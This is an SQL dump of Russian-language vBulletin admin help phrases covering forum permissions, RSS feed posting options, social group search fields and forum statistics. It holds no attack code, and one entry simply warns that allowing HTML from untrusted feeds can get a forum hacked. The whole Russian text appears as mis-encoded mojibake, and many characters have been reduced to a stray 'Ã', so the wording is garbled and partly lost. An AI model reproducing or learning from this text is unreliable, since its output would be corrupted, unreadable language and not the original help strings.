\r\n\r\nÄëÿ íà÷àëà âûáåðèòå ðàçäåë è ãðóïïó ïîëüçîâàòåëåé, ÷üè ïðàâà âû æåëàåòå ïðîñìîòðåòü. Çàòåì îòìåòüòå ïðàâà, êîòîðûå âû æåëàåòå ïðîñìîòðåòü. Ãàæìèòå \"Ãàéòè\" äëÿ ïðîñìîòðà ïðàâ.', 'vbulletin', '', 0, ''), (23831, -1, 'resources_index_title', 'cphelptext', 'Ãîêàçàòü ïðàâà ðàçäåëà', 'vbulletin', '', 0, ''), (23832, -1, 'resources_index_forumid_text', 'cphelptext', 'Âûáåðèòå ðàçäåë, â êîòîðîì âû æåëàåòå ïðîñìîòðåòü ïðàâà.', 'vbulletin', '', 0, ''), (23833, -1, 'resources_index_forumid_title', 'cphelptext', 'Ãàçäåë', 'vbulletin', '', 0, ''), (23834, -1, 'resources_index_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâàòåëåé, ÷üè ïðàâà â âûáðàííîì ðàçäåëå âû æåëàåòå ïðîñìîòðåòü.', 'vbulletin', '', 0, ''), (23835, -1, 'resources_index_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâàòåëåé', 'vbulletin', '', 0, ''), (23836, -1, 'resources_view_text', 'cphelptext', 'Ãèæå íàõîäèòñÿ ñïèñîê ïðàâ ðàçäåëà äëÿ âûáðàííûõ ðàçäåëà è ãðóïïû ïîëüçîâàòåëåé.', 'vbulletin', '', 0, ''), (23837, -1, 'resources_view_title', 'cphelptext', 'Ãàçðåøåíèÿ', 'vbulletin', '', 0, ''), (23838, -1, 'resources_viewuser_text', 'cphelptext', 'Çäåñü âû ìîæåòå ïðîñìîòðåòü ïðàâà ïîëüçîâàòåëÿ íà óðîâíå ðàçäåëà.', 'vbulletin', '', 0, ''), (23839, -1, 'resources_viewuser_title', 'cphelptext', 'Ãðîñìîòð ïîëüçîâàòåëÿ', 'vbulletin', '', 0, ''), (23840, -1, 'rssposter_edit_resetlastrun_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âûáðàíà, òî ïðè ñîõðàíåíèè ëåíòû âðåìÿ ïîñëåäíåé ïðîâåðêè áóäåò ñáðîøåíî. Ñëåäîâàòåëüíî, äàííàÿ ëåíòà áóäåò ïðîâåðåíà ïðè ñëåäóþùåì çàïóñêå çàïëàíèðîâàííîé çàäà÷è ïîääåðæêè RSS, âíå çàâèñèìîñòè îò îïöèè ÷àñòîòû ïðîâåðêè äàííîé ëåíòû.', 'vbulletin', 'zCarot', 1209205296, '3.7.0'), (23841, -1, 'rssposter_edit_resetlastrun_title', 'cphelptext', 'Ñáðîñ âðåìåíè ïîñëåäíåé ïðîâåðêè', 'vbulletin', 'zCarot', 1149677250, '3.6.0 Beta 1'), (23842, -1, 'rssposter_edit_enabled_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ëåíòà íå áóäåò ïðîâåðåíà ïðè çàïóñêå ñîîòâåòñòâóþùåé çàïëàíèðîâàííîé çàäà÷è.
\r\n
\r\nÃòî èñïîëüçóåòñÿ äëÿ âðåìåííîãî îòêëþ÷åíèÿ ëåíòû áåç å¸ óäàëåíèÿ.', 'vbulletin', 'zCarot', 1149677240, '3.6.0 Beta 1'), (23843, -1, 'rssposter_edit_enabled_title', 'cphelptext', 'RSS ëåíòà âêëþ÷åíà', 'vbulletin', 'zCarot', 1149677240, '3.6.0 Beta 1'), (23844, -1, 'rssposter_edit_title_text', 'cphelptext', 'Çàãîëîâîê äîëæåí êðàòêî îïèñûâàòü ñîäåðæèìîå ëåíòû äëÿ óïðîùåíèÿ ïîèñêà â óïðàâëåíèè RSS ëåíòàìè.', 'vbulletin', 'zCarot', 1149677290, '3.6.0 Beta 1'), (23845, -1, 'rssposter_edit_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', 'zCarot', 1149677290, '3.6.0 Beta 1'), (23846, -1, 'rssposter_edit_url_text', 'cphelptext', 'Ãòî ïîëå äîëæíî ñîäåðæàòü ïîëíûé àäðåñ ëåíòû.
\r\n
\r\nÃàïðèìåð: http://www.example.com/forum/external.php?type=RSS2&forumids=1', 'vbulletin', 'zCarot', 1149677544, '3.6.0 Beta 1'), (23847, -1, 'rssposter_edit_url_title', 'cphelptext', 'Àäðåñ ëåíòû', 'vbulletin', 'zCarot', 1149677544, '3.6.0 Beta 1'), (23848, -1, 'rssposter_edit_ttl_text', 'cphelptext', 'Çàïëàíèðîâàííàÿ çàäà÷à ïîääåðæêè RSS çàïóñêàåòñÿ êàæäûå 10 ìèíóò, ïîýòîìó âû ìîæåòå îãðàíè÷èòü ÷àñòîòó ïðîâåðêè äàííîé ëåíòû ñ òî÷íîñòüþ äî 10 ìèíóò.', 'vbulletin', 'zCarot', 1149677740, '3.6.0 Beta 1'), (23849, -1, 'rssposter_edit_ttl_title', 'cphelptext', 'Ãðîâåðÿòü ëåíòó êàæäûå...', 'vbulletin', 'zCarot', 1149677740, '3.6.0 Beta 1'), (23850, -1, 'rssposter_edit_maxresults_text', 'cphelptext', 'Ãåêîòîðûå ëåíòû ìîãóò âûäàâàòü ñïèñîê èç íåñêîëüêèõ ýëåìåíòîâ ñðàçó. Åñëè âû æåëàåòå îãðàíè÷èòü ÷èñëî îáðàáàòûâàåìûõ ýëåìåíòîâ çà îäíó ïðîâåðêó, òî ââåäèòå ñþäà èõ ìàêñèìàëüíîå êîëè÷åñòâî.
\r\n
\r\nÃàïðèìåð, åñëè âû çäåñü óêàæåòå \"5\", òî øåñòîé, ñåäüìîé è ïîñëåäóþùèå ýëåìåíòû áóäóò ïðîèãíîðèðîâàíû.
\r\n
\r\nÂâåäèòå 0, ÷òîáû îáðàáàòûâàòü âñå ýëåìåíòû.', 'vbulletin', 'zCarot', 1149677952, '3.6.0 Beta 1'), (23851, -1, 'rssposter_edit_maxresults_title', 'cphelptext', 'Ìàêñèìóì ýëåìåíòîâ äëÿ îáðàáîòêè', 'vbulletin', 'zCarot', 1149677952, '3.6.0 Beta 1'), (23852, -1, 'rssposter_edit_searchwords_text', 'cphelptext', 'Âû ìîæåòå óêàçàòü ñïèñîê ñëîâ è ôðàç, ïî êîòîðûì ñëåäóåò âûáèðàòü ýëåìåíòû ëåíòû RSS.

\r\nÃàçäåëÿéòå êàæäîå ñëîâî/ôðàçó ïðîáåëîì èëè ïåðåâîäîì ñòðîêè.

\r\nÔðàçû, êîòîðûå ñîäåðæàò ïðîáåëû ìîæíî äîáàâèòü, åñëè ïîìåñòèòü âîêðóã íèõ äâîéíûå êàâû÷êè.

\r\nÅñëè ëþáîå èç ýòèõ ñëîâ èëè ôðàç áóäåò íàõîäèòüñÿ â çàãîëîâêå (èëè çàãîëîâêå È îïèñàíèè, åñëè âûáðàíî \"Èñêàòü â îïèñàíèè\"), òî ýëåìåíò áóäåò ðàçìåù¸í íà ôîðóìå. Åñëè ñîâïàäåíèé íåò, òî ýëåìåíò áóäåò ïðîèãíîðèðîâàí.

\r\nÅñëè âûáðàíî \"Ñîâïàäåíèå âñåõ ñëîâ\", òî áóäóò ðàçìåùåíû òîëüêî òå ýëåìåíòû, â êîòîðûõ âñòðå÷àþòñÿ ÂÑÅ óêàçàííûå çäåñü ñëîâà è ôðàçû.

', 'vbulletin', 'zCarot', 1220447959, '3.8.0 Alpha 1'), (23853, -1, 'rssposter_edit_searchwords_title', 'cphelptext', 'Âûáîðêà ýëåìåíòîâ ïî ñëîâàì', 'vbulletin', 'zCarot', 1149679577, '3.6.0 Beta 1'), (23854, -1, 'rssposter_edit_username_text', 'cphelptext', 'Ââåäèòå ñþäà èìÿ ïîëüçîâàòåëÿ, ïîä êîòîðûì áóäóò ðàçìåùàòüñÿ ýëåìåíòû ëåíòû íà ôîðóìå.
\r\n
\r\nÈìÿ ïîëüçîâàòåëÿ äîëæíî óæå áûòü çàðåãèñòðèðîâàíî íà ôîðóìå! Ñîâåò: âû ìîæåòå ñîçäàòü íîâîãî ïîëüçîâàòåëÿ ñïåöèàëüíî äëÿ ðàçìåùåíèÿ ýëåìåíòîâ RSS ëåíò.', 'vbulletin', 'zCarot', 1149678038, '3.6.0 Beta 1'), (23855, -1, 'rssposter_edit_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', 'zCarot', 1149678038, '3.6.0 Beta 1'), (23856, -1, 'rssposter_edit_forumid_text', 'cphelptext', 'Óêàæèòå çäåñü ðàçäåë, â êîòîðûé âû æåëàåòå ïîìåùàòü ýëåìåíòû èç äàííîé RSS ëåíòû.
\r\n
\r\nÂàæíî: óáåäèòåñü, ÷òî ðàçäåë íå ÿâëÿåòñÿ êàòåãîðèåé.', 'vbulletin', 'zCarot', 1149678216, '3.6.0 Beta 1'), (23857, -1, 'rssposter_edit_forumid_title', 'cphelptext', 'Ãàçäåë', 'vbulletin', 'zCarot', 1149678060, '3.6.0 Beta 1'), (23858, -1, 'rssposter_edit_allowsmilies_text', 'cphelptext', 'Åñëè \"Äà\", òî ëþáûå êîäû ñìàéëîâ, êîòîðûå áóäóò íàéäåíû â ýëåìåíòàõ RSS ëåíòû, áóäóò ïðåîáðàçîâàíû â ñîîòâåòñòâóþùèå èçîáðàæåíèÿ.', 'vbulletin', 'zCarot', 1149678268, '3.6.0 Beta 1'), (23859, -1, 'rssposter_edit_allowsmilies_title', 'cphelptext', 'Êîíâåðòèðîâàòü ñìàéëû', 'vbulletin', 'zCarot', 1149678268, '3.6.0 Beta 1'), (23860, -1, 'rssposter_edit_showsignature_text', 'cphelptext', 'Åñëè \"Äà\", òî ïðè ðàçìåùåíèè ýëåìåíòîâ RSS ëåíòû áóäåò îòîáðàæàòüñÿ ïîäïèñü ïîëüçîâàòåëÿ, ïîä êîòîðûì îíè áóäóò ðàçìåùàòüñÿ.', 'vbulletin', 'zCarot', 1149678310, '3.6.0 Beta 1'), (23861, -1, 'rssposter_edit_showsignature_title', 'cphelptext', 'Ãîêàçûâàòü ïîäïèñü', 'vbulletin', 'zCarot', 1149678310, '3.6.0 Beta 1'), (23862, -1, 'rssposter_edit_html2bbcode_text', 'cphelptext', 'Åñëè âêëþ÷åíî, òî ëþáîé HTML êîä, íàõîäÿùèéñÿ â RSS ëåíòå, áóäåò ïåðåä ðàçìåùåíèåì ïðåîáðàçîâàí â BB êîä. Ãòà îïöèÿ çàòðàãèâàåò òîëüêî íîâûå ýëåìåíòû. Óæå ðàçìåù¸ííûå íå áóäóò ïðåîáðàçîâàíû.', 'vbulletin', 'zCarot', 1206966113, '3.7.0 Release Candidate 2'), (23863, -1, 'rssposter_edit_html2bbcode_title', 'cphelptext', 'Ãðåîáðàçîâàòü HTML â BB êîäû', 'vbulletin', 'zCarot', 1150892058, '3.6.0 Beta 3'), (23864, -1, 'rssposter_edit_titletemplate_text', 'cphelptext', 'Øàáëîí çàãîëîâêà îïðåäåëÿåò, êàê áóäåò îòîáðàæàòüñÿ çàãîëîâîê òåìû èëè îáúÿâëåíèÿ ïðè ðàçìåùåíèè ýëåìåíòîâ RSS ëåíòû.
\r\n
\r\nÂû ìîæåòå èñïîëüçîâàòü îïðåäåë¸ííûå ÷àñòè XML ëåíòû ñ ïîìîùüþ äîáàâëåíèÿ â øàáëîí {feed:x}, ãäå \'x\' ññûëàåòñÿ íà îäèí èç ïàðàìåòðîâ:\r\n
    \r\n
  • title
  • \r\n
  • description
  • \r\n
  • link
  • \r\n
  • id
  • \r\n
  • date
  • \r\n
  • enclosure_href
  • \r\n
  • content:encoded.
  • \r\n
\r\n
\r\n áîëüøèíñòâå ñëó÷àåâ âàì ñëåäóåò èñïîëüçîâàòü {feed:title}, ÷òîáû îòîáðàæàòü çàãîëîâîê èç òåêóùåãî ýëåìåíòà ëåíòû.', 'vbulletin', 'zCarot', 1193149089, '3.7.0 Beta 1'), (23865, -1, 'rssposter_edit_titletemplate_title', 'cphelptext', 'Øàáëîí çàãîëîâêà', 'vbulletin', 'zCarot', 1149682430, '3.6.0 Beta 1'), (23866, -1, 'rssposter_edit_bodytemplate_text', 'cphelptext', 'Øàáëîí òåëà îïðåäåëÿåò îñíîâíîé òåêñò òåìû èëè îáúÿâëåíèÿ äëÿ ýëåìåíòîâ ëåíòû.
\r\n
\r\nÒàê æå, êàê è â øàáëîíå çàãîëîâêà, âû ìîæåòå èñïîëüçîâàòü îïðåäåë¸ííûå ÷àñòè XML ëåíòû ñ ïîìîùüþ äîáàâëåíèÿ â øàáëîí {feed:x}.
\r\nÄîïóñòèìûå çíà÷åíèÿ äëÿ ïàðàìåòðà x:
\r\n
    \r\n
  • title
  • \r\n
  • description
  • \r\n
  • link
  • \r\n
  • id
  • \r\n
  • date
  • \r\n
  • enclosure_href
  • \r\n
  • content:encoded.
  • \r\n
\r\n
\r\nÎñíîâíûìè ïàðàìåòðàìè äëÿ øàáëîíà òåëà ÿâëÿþòñÿ <description> è <link>, êîòîðûå ìîãóò áûòü âñòàâëåíû ñ ïîìîùüþ {feed:description} è {feed:link}.
\r\n
\r\nÃàïðèìåð:\r\n
[b] [i]ìîåé RSS ëåíòå[/i] òîëüêî ÷òî ïîÿâèëîñü ñëåäóþùåå:[/b]\r\n\r\n{feed:description}\r\n\r\n[url="{feed:link}"]Ãàæìèòå çäåñü, ÷òîáû ïðî÷åñòü ïîëíóþ çàïèñü.[/url]
', 'vbulletin', 'zCarot', 1193149585, '3.7.0 Beta 1'), (23867, -1, 'rssposter_edit_bodytemplate_title', 'cphelptext', 'Øàáëîí òåëà', 'vbulletin', 'zCarot', 1149682725, '3.6.0 Beta 1'), (23868, -1, 'rssposter_edit_itemtype_text', 'cphelptext', 'Ãëåìåíòû èç RSS ëåíòû ìîãóò áûòü ðàçìåùåíû íà ôîðóìå â âèäå òåì èëè îáúÿâëåíèé.
\r\n
\r\nÃàçëè÷íûå ïàðàìåòðû äëÿ êàæäîãî òèïà ðàçìåùåíèÿ îïèñàíû íèæå.
\r\n
\r\nÃîìíèòå, ÷òî ïîëüçîâàòåëè íå ñìîãóò îòâåòèòü â îáúÿâëåíèè. Ãîýòîìó, åñëè âû æåëàåòå, ÷òîáû ðàçìåùåíèå ýëåìåíòîâ RSS ëåíòû îáñóæäàëîñü ïîëüçîâàòåëÿìè, òî, âåðîÿòíî, ëó÷øå ñòîèò ðàçìåùàòü ýëåìåíòû êàê òåìû.', 'vbulletin', 'zCarot', 1149683708, '3.6.0 Beta 1'), (23869, -1, 'rssposter_edit_itemtype_title', 'cphelptext', 'Ñîçäàâàòü ýëåìåíòû êàê òåìû èëè îáúÿâëåíèÿ', 'vbulletin', 'zCarot', 1149683708, '3.6.0 Beta 1'), (23870, -1, 'rssposter_edit_prefixid_text', 'cphelptext', 'Âû ìîæåòå èñïîëüçîâàòü äàííûé ïàðàìåòð, ÷òîáû àâòîìàòè÷åñêè äîáàâëÿòü ïðåôèêñ ê ñîçäàâàåìûì òåìàì. Îäíàêî, äàííûé ïðåôèêñ äîëæåí áûòü ðàçðåø¸í â ðàçäåëå, ãäå áóäóò ðàçìåùåíû íîâûå òåìû. ×òîáû óáåäèòüñÿ, ÷òî äàííûé ïðåôèêñ ðàçðåø¸í â âûáðàííîì ðàçäåëå, âàì ñëåäóåò óçíàòü, â êàêîì íàáîðå ïðåôèêñîâ íàõîäèòñÿ âûáðàííûé âàìè ïðåôèêñ, à çàòåì ïåðåéòè â \"óïðàâëåíèå ðàçäåëàìè\" è îòðåäàêòèðîâàòü âûáðàííûé ðàçäåë äëÿ ýòîé ëåíòû, äîáàâèâ (èëè óáåäèâøèñü, ÷òî óæå äîáàâëåí) íóæíûé íàáîð ïðåôèêñîâ.', 'vbulletin', 'zCarot', 1190110337, '3.7.0 Beta 1'), (23871, -1, 'rssposter_edit_prefixid_title', 'cphelptext', 'Ãðåôèêñ', 'vbulletin', 'zCarot', 1190110337, '3.7.0 Beta 1'), (23872, -1, 'rssposter_edit_iconid_text', 'cphelptext', 'Âûáåðèòå èêîíêó, êîòîðàÿ áóäåò èñïîëüçîâàíà äëÿ òåì, ñîçäàííûõ èç ýëåìåíòîâ äàííîé RSS ëåíòû.', 'vbulletin', 'zCarot', 1149683270, '3.6.0 Beta 1'), (23873, -1, 'rssposter_edit_iconid_title', 'cphelptext', 'Èêîíêè äëÿ ñîîáùåíèÿ', 'vbulletin', 'zCarot', 1149683270, '3.6.0 Beta 1'), (23874, -1, 'rssposter_edit_stickthread_text', 'cphelptext', 'Âûáåðèòå \"Äà\", åñëè âû æåëàåòå, ÷òîáû òåìû, ñîçäàííûå èç ýëåìåíòîâ äàííîé RSS ëåíòû, àâòîìàòè÷åñêè ïîìå÷àëèñü êàê \"âàæíûå\", ÷òî ïîçâîëèò ïîìåñòèòü èõ íàâåðõ ñïèñêà îòîáðàæåíèÿ òåì ðàçäåëà.', 'vbulletin', 'zCarot', 1149683771, '3.6.0 Beta 1'), (23875, -1, 'rssposter_edit_stickthread_title', 'cphelptext', 'Ñäåëàòü òåìó âàæíîé', 'vbulletin', 'zCarot', 1149683771, '3.6.0 Beta 1'), (23876, -1, 'rssposter_edit_moderatethread_text', 'cphelptext', 'Åñëè âû æåëàåòå, ÷òîáû ïåðåä ðàçìåùåíèåì ýëåìåíòîâ ðóêîâîäñòâî ôîðóìà ìîãëî ïðîñìîòðåòü è îòðåäàêòèðîâàòü êàæäûé ýëåìåíò RSS ëåíòû äî òîãî êàê îí ïîÿâèòñÿ íà ôîðóìå, òî âûáåðèòå çäåñü \"Äà\".', 'vbulletin', 'zCarot', 1149683930, '3.6.0 Beta 1'), (23877, -1, 'rssposter_edit_moderatethread_title', 'cphelptext', 'Ãðîâåðêà òåì', 'vbulletin', 'zCarot', 1149683930, '3.6.0 Beta 1'), (23878, -1, 'rssposter_edit_threadactiondelay_text', 'cphelptext', 'Åñëè ýëåìåíòû ðàçìåùàþòñÿ êàê òåìû, òî âû ìîæåòå óêàçàòü çäåñü âðåìÿ, ïî ïðîøåñòâèè êîòîðîãî áóäåò âûïîëíåíî íåêîòîðîå äåéñòâèå íàä òåìîé.
\r\n
\r\nÃàïðèìåð, âû ìîæåòå óêàçàòü çäåñü 6 ÷àñîâ è íèæå óêàçàòü çàêðûòèå òåì ïîñëå èñòå÷åíèÿ ýòîãî âðåìåíè.
\r\n
\r\nÅñëè çäåñü óêàçàíî 0, òî òåìà íèêîãäà íå óñòàðååò, ïîýòîìó íèêàêèå äåéñòâèÿ íå áóäóò âûïîëíåíû àâòîìàòè÷åñêè ïîñëå ñîçäàíèÿ òåì èç ýëåìåíòîâ RSS ëåíòû.', 'vbulletin', 'zCarot', 1149684592, '3.6.0 Beta 1'), (23879, -1, 'rssposter_edit_threadactiondelay_title', 'cphelptext', 'Âðåìÿ óñòàðåâàíèÿ òåìû', 'vbulletin', 'zCarot', 1149684477, '3.6.0 Beta 1'), (23880, -1, 'rssposter_edit_unstickthread_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, ÷òîáû ñíèìàòü ñòàòóñ \"Âàæíàÿ\" ñ òåì èç ýëåìåíòîâ RSS ëåíòû, ïîñëå òîãî êàê îíè óñòàðåþò.', 'vbulletin', 'zCarot', 1149684720, '3.6.0 Beta 1'), (23881, -1, 'rssposter_edit_unstickthread_title', 'cphelptext', 'Ñíèìàòü ñòàòóñ \"Âàæíàÿ\" ñ òåìû ïðè óñòàðåâàíèè', 'vbulletin', 'zCarot', 1149684697, '3.6.0 Beta 1'), (23882, -1, 'rssposter_edit_closethread_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ, ÷òîáû àâòîìàòè÷åñêè çàêðûâàòü òåìû èç ýëåìåíòîâ RSS ëåíòû, ïîñëå òîãî êàê îíè óñòàðåþò.', 'vbulletin', 'zCarot', 1149684686, '3.6.0 Beta 1'), (23883, -1, 'rssposter_edit_closethread_title', 'cphelptext', 'Çàêðûâàòü òåìó ïðè óñòàðåâàíèè', 'vbulletin', 'zCarot', 1149684703, '3.6.0 Beta 1'), (23884, -1, 'rssposter_edit_allowhtml_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ëþáîé HTML êîä â ýëåìåíòàõ RSS ëåíòû áóäåò âñòàâëÿòüñÿ â îáúÿâëåíèÿ êàê HTML êîä.
\r\n
\r\nÃÃ¥ âêëþ÷àéòå ýòó îïöèþ, åñëè âû íå ïîëíîñòüþ äîâåðÿåòå èñòî÷íèêó RSS ëåíòû, òàê êàê ïðè äîáàâëåíèè îïðåäåë¸ííîãî HTML êîäà âàø ôîðóì ìîæåò áûòü âçëîìàí!', 'vbulletin', 'zCarot', 1149684884, '3.6.0 Beta 1'), (23885, -1, 'rssposter_edit_allowhtml_title', 'cphelptext', 'Ãàçðåøèòü HTML â îáúÿâëåíèÿõ', 'vbulletin', 'zCarot', 1149684884, '3.6.0 Beta 1'), (23886, -1, 'rssposter_edit_endannouncement_text', 'cphelptext', 'Ãî ïðîøåñòâèè ýòîãî êîëè÷åñòâà äíåé äàííîå îáúÿâëåíèå ñòàíåò íåàêòèâíûì è èñ÷åçíåò ñ ïóáëè÷íîãî îáîçðåíèÿ.', 'vbulletin', 'zCarot', 1149684933, '3.6.0 Beta 1'), (23887, -1, 'rssposter_edit_endannouncement_title', 'cphelptext', 'Êîëè÷åñòâî äíåé, â òå÷åíèå êîòîðûõ áóäåò àêòèâíî îáúÿâëåíèå', 'vbulletin', 'zCarot', 1149684933, '3.6.0 Beta 1'), (23888, -1, 'socialgroup_icon_switchtype_groupiconpath_text', 'cphelptext', 'Ãòî ïóòü ê èêîíêàì ñîöèàëüíûõ ãðóïï, ïî êîòîðîìó îíè õðàíÿòñÿ â ôàéëîâîé ñèñòåìå (åñëè, êîíå÷íî, îíè õðàíÿòñÿ íå â áàçå äàííûõ). ÃÃ¥ ñëåäóåò èçìåíÿòü ýòîò ïàðàìåòð, åñëè âû íå óâåðåíû, ÷òî ïðàâèëüíî ïîñòóïàåòå.', 'vbulletin', 'zCarot', 1220958784, '3.8.0 Alpha 1'), (23889, -1, 'socialgroup_icon_switchtype_groupiconpath_title', 'cphelptext', 'Ãóòü ê ôàéëàì èêîíîê ñîöèàëüíûõ ãðóïï', 'vbulletin', 'zCarot', 1220958784, '3.8.0 Alpha 1'), (23890, -1, 'socialgroup_icon_switchtype_groupiconurl_text', 'cphelptext', 'Ãòî ññûëêà íà äèðåêòîðèþ, â êîòîðîé õðàíÿòñÿ èêîíêè ñîöèàëüíûõ ãðóïï, åñëè îíè õðàíÿòñÿ â ôàéëîâîé ñèñòåìå. ÃÃ¥ ñëåäóåò èçìåíÿòü ýòîò ïàðàìåòð, åñëè âû íå óâåðåíû, ÷òî ïðàâèëüíî ïîñòóïàåòå.', 'vbulletin', 'zCarot', 1220958848, '3.8.0 Alpha 1'), (23891, -1, 'socialgroup_icon_switchtype_groupiconurl_title', 'cphelptext', 'Ññûëêà íà èêîíêè ñîöèàëüíûõ ãðóïï ', 'vbulletin', 'zCarot', 1220958848, '3.8.0 Alpha 1'), (23892, -1, 'socialgroups_editcategory_description_text', 'cphelptext', 'Ãîäðîáíîå îïèñàíèå äàííîé êàòåãîðèè.', 'vbulletin', 'zCarot', 1220958690, '3.8.0 Alpha 1'), (23893, -1, 'socialgroups_editcategory_description_title', 'cphelptext', 'Îïèñàíèå', 'vbulletin', 'zCarot', 1220958657, '3.8.0 Alpha 1'), (23894, -1, 'socialgroups_editcategory_displayorder_text', 'cphelptext', 'Îïðåäåëÿåò ìåñòîïîëîæåíèå â ñïèñêå âûáîðà êàòåãîðèé.', 'vbulletin', 'zCarot', 1220958714, '3.8.0 Alpha 1'), (23895, -1, 'socialgroups_editcategory_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðàæåíèÿ', 'vbulletin', 'zCarot', 1220958714, '3.8.0 Alpha 1'), (23896, -1, 'socialgroups_editcategory_title_text', 'cphelptext', 'Ãàçâàíèå êàòåãîðèè ñîöèàëüíûõ ãðóïï. Îíî îòîáðàæàåòñÿ ïðè ïðîñìîòðå ñîöèàëüíîé ãðóïïå è âûáîðêå ñîöèàëüíûõ ãðóïï ïî êàòåãîðèÿì. Èç êàòåãîðèé ñîñòàâëÿåòñÿ îáëàêî ïðè îáçîðå ñîöèàëüíûõ ãðóïï.', 'vbulletin', 'zCarot', 1220958618, '3.8.0 Alpha 1'), (23897, -1, 'socialgroups_editcategory_title_title', 'cphelptext', 'Çàãîëîâîê', 'vbulletin', 'zCarot', 1220958618, '3.8.0 Alpha 1'), (23898, -1, 'socialgroups_search_category_text', 'cphelptext', '>Èñêàòü ãðóïïû, ïðèíàäëåæàùèå óêàçàííîé êàòåãîðèè.', 'vbulletin', 'zCarot', 1215784065, '3.8.0 Alpha 1'), (23899, -1, 'socialgroups_search_category_title', 'cphelptext', 'Êàòåãîðèÿ', 'vbulletin', 'zCarot', 1215784065, '3.8.0 Alpha 1'), (23900, -1, 'socialgroups_search_creator_text', 'cphelptext', 'Èñêàòü ãðóïïû, îñíîâàííûå äàííûì ïîëüçîâàòåëåì', 'vbulletin', 'zCarot', 1205513857, '3.7.0 Release Candidate 1'), (23901, -1, 'socialgroups_search_creator_title', 'cphelptext', 'Îñíîâàòåëü ãðóïïû', 'vbulletin', 'zCarot', 1205513857, '3.7.0 Release Candidate 1'), (23902, -1, 'socialgroups_search_date_gteq_text', 'cphelptext', 'Èñêàòü ãðóïïû, ñîçäàííûå ïîñëå ýòîé äàòû.', 'vbulletin', 'zCarot', 1205513779, '3.7.0 Release Candidate 1'), (23903, -1, 'socialgroups_search_date_gteq_title', 'cphelptext', 'Äàòà ñîçäàíèÿ ïîñëå', 'vbulletin', 'zCarot', 1205513779, '3.7.0 Release Candidate 1'), (23904, -1, 'socialgroups_search_date_lteq_text', 'cphelptext', 'Èñêàòü ãðóïïû, ñîçäàííûå ðàíåå ýòîé äàòû.', 'vbulletin', 'zCarot', 1205513744, '3.7.0 Release Candidate 1'), (23905, -1, 'socialgroups_search_date_lteq_title', 'cphelptext', 'Äàòà ñîçäàíèÿ äî', 'vbulletin', 'zCarot', 1205513744, '3.7.0 Release Candidate 1'), (23906, -1, 'socialgroups_search_filtertext_text', 'cphelptext', 'Ñëîâà, ïðèñóòñòâóþùèå â ñîöèàëüíîé ãðóïïå (â íàçâàíèè è/èëè îïèñàíèè).', 'vbulletin', 'zCarot', 1205513658, '3.7.0 Release Candidate 1'), (23907, -1, 'socialgroups_search_filtertext_title', 'cphelptext', 'Êëþ÷åâûå ñëîâà', 'vbulletin', 'zCarot', 1213632849, '3.8.0 Alpha 1'), (23908, -1, 'socialgroups_search_members_gteq_text', 'cphelptext', 'Èñêàòü ãðóïïû ñ êîëè÷åñòâîì ó÷àñòíèêîâ áîëüøå óêàçàííîãî çäåñü.', 'vbulletin', 'zCarot', 1205513691, '3.7.0 Release Candidate 1'), (23909, -1, 'socialgroups_search_members_gteq_title', 'cphelptext', 'Ó÷àñòíèêîâ áîëüøå', 'vbulletin', 'zCarot', 1205513691, '3.7.0 Release Candidate 1'), (23910, -1, 'socialgroups_search_members_lteq_text', 'cphelptext', 'Èñêàòü ãðóïïû ñ êîëè÷åñòâîì ó÷àñòíèêîâ ìåíüøå óêàçàííîãî çäåñü.', 'vbulletin', 'zCarot', 1205513712, '3.7.0 Release Candidate 1'), (23911, -1, 'socialgroups_search_members_lteq_title', 'cphelptext', 'Ó÷àñòíèêîâ ìåíüøå', 'vbulletin', 'zCarot', 1205513712, '3.7.0 Release Candidate 1'), (23912, -1, 'socialgroups_search_type_text', 'cphelptext', 'Èñêàòü ãðóïïû äàííîãî òèïà.', 'vbulletin', 'zCarot', 1205513940, '3.7.0 Release Candidate 1'), (23913, -1, 'socialgroups_search_type_title', 'cphelptext', 'Òèï ãðóïïû', 'vbulletin', 'zCarot', 1205513940, '3.7.0 Release Candidate 1'), (23914, -1, 'stats_text', 'cphelptext', 'Ñïðàâî÷íûå ñòàòüè:
\r\nÑòàòèñòèêà
\r\nÇàïèñè äåéñòâèé ïàíåëè àäìèíèñòðàòîðà
\r\nÇàïèñè äåéñòâèé ìîäåðàòîðîâ
\r\nÇàïèñè âûïîëíåíèé çàïëàíèðîâàííûõ çàäàíèé

\r\n\r\nÑòàòèñòèêà:
\r\nÑòðàíèöà ñòàòèñòèêè ôîðóìà ñîäåðæèò â ñåáå ðàçíîîáðàçíóþ ñòàòèñòèêó âàøåãî ôîðóìà. Ñòàòèñòèêà íà ýòîé ñòðàíèöå âêëþ÷àåò â ñåáÿ ñòàòèñòèêó \"ñàìûõ\" (Ñàìûé íîâûé ïîëüçîâàòåëü íà ôîðóìå, Ëó÷øèé àâòîð, Ãåêîðä ïîñåùàåìîñòè ïîëüçîâàòåëåé è ò.ä.), à òàêæå ðàçíîîáðàçíóþ ñòàòèñòèêó àêòèâíîñòè íà ôîðóìå.

